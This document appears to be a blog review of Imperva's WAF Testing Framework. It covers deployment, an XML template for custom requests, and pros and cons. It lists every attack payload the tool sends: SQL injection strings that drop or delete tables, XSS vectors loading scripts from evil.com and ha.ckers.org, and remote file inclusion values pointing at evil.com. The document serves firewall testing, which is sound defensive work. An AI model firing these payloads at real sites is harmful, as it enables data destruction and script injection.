WAF Testing Framework is developed by Imperva employees (Yaniv Azaria, Amichai Shulman) and was presented at OWASP AppSec USA in 2012.
To work properly it requires:

  • Windows OS
  • Java 1.6
  • WebGoat application

Deployment

WebGoat application is provided with the tool, or you can use one from other sources (e.g. OWASPbwa). Deployment process looks easy - install Java and run compiled exe-file, but still you need at least one Windows VM to run the tool.
The network scheme looks this way

Tests

If first attack is blocked, the tool stops sending similar requests. So to get whole list of attacks I've sent them to unprotected application. There is a list of all possible requests below, which include: 5 HTTP Parameter Pollution, 33 Remote File Inclusion, 17 Cross-Site Scripting, 10 SQL injection.
Besides that the tool sends 234 legit requests, supposed to cause false-positives like

message=We dropped a million Deutschemark to get the schematic (and it was not worth it)
message=this is not good; drop the item you are holding!&SUBMIT=Submit
message=select one item from these funny things =)

HTTP Parameter Pollution

message=' or '&message=' <> 'x'
message=' or '&message=' <> 'xxx'
message=' or '&message=' <> 'xyz'
message=' or '&message=' = ','
message=' union/*&message=*/select number from credit_card

Remote File Inclusion

bidirect=http://www.acbdef.com/index.html
isDirect=http://www.acbdef.com/index.html
p_direction=http://www.acbdef.com/index.html
p_redirect_uri=http://www.acbdef.com/index.html
redirect=http://www.acbdef.com/index.html
redirect_uri=http://www.acbdef.com/index.html
redirecturl=http://www.acbdef.com/index.html
strRedirect=http://www.acbdef.com/index.html
document_root=http://www.evil.com/getdata.php
spaw_root=http://www.evil.com/getdata.php
CONF_INCLUDE_PATH=http://www.evil.com/getdata.php
page=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
base_path=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
dir=http://www.evil.com/getdata.php
url=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
include_path=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
lng=http://www.evil.com/getdata.php
path_faqe=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
root=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
PathToRoot=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
template=http://www.evil.com/getdata.php
menu=http://www.evil.com/getdata.php

SQL Injection

message=' or 'a' = (select 'a')
message=' or 12345678 or 1=1
message= a' or 1 = (select 1 from dual)
message=a'; delete from customers where id = 12
message=a'; drop function login
message=a'; drop table users
message=a' or (case when 'a' then 1 else 0 end) = 0;
message=a' or (false) = 'c'	
message=a' or (select 1) = 1
message=a' or -+!1= -+!1

Cross-Site Scripting (XSS)

message=<BODY ONLOAD=alert('XSS')>
message=<IMG DYNSRC="javascript:alert('XSS')">
message=<IMG SRC=" &#14;  javascript:alert('XSS');">
message=<IMG SRC="jav&#x0A;ascript:alert('XSS');">
message=<IMG SRC="javascript:alert('XSS');">
message=<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
message=<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
message=<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
message=<IMG SRC=`javascript:alert("xxxx, 'XSS'")`>
message=<IMG SRC=javascript:alert(&quot;XSS&quot;)>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
message=<SCRIPT/SRC="http://www.evil.com/xss.js"></SCRIPT>
message=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
message=<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

Custom attacks

The framework provides ability to add additional requests in XML format. Template looks this way

<?xml version="1.0" encoding="UTF-8"?>

<http-recording>
    <sequence repeat="1">
        <request method="POST" protocol="http" protocol-version="HTTP/1.1" path="/sendmsg.jsp">
            <headers>
                <header name="Accept"><![CDATA[application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*]]></header>
                <header name="Accept-Language"><![CDATA[en-US]]></header>
                <header name="Content-Type"><![CDATA[application/x-www-form-urlencoded]]></header>
                <header name="Pragma"><![CDATA[no-cache]]></header>
            </headers>
            <body><![CDATA[subj=&text='+or+1=1+--+1&Username=Anonymous&x=32&y=7]]></body>
            <comment>Simple SQL Injection</comment>
        </request>
     </sequence>
 </http-recording>

In request attributes should be set:

  • method: POST
  • protocol: http
  • protocol-version: HTTP/1.1
  • path including GET arguments: sendmsg.jsp
    Add headers to the requests like Accept,Accept-Language,Content-Type,Pragma.
    Request body and comment that will be included in the report.

Resume

Report Example

report.pdf

Pros

  • Easy to deploy if you have ready to use Windows environment
  • Framework allows to add custom attack samples in XML-format
  • Report looks nice

Cons

  • Low attacks amount
  • Attack samples are hard-coded somewhere inside compiled package
  • Windows platform to run the tool
  • No CSRF tokens support. If WAF adds CSRF token protection, all POST-requests would be blocked
  • Works adequately only with custom WebGoat application

Reference materials

Video-presentation

Download page
Description
Slides from presentation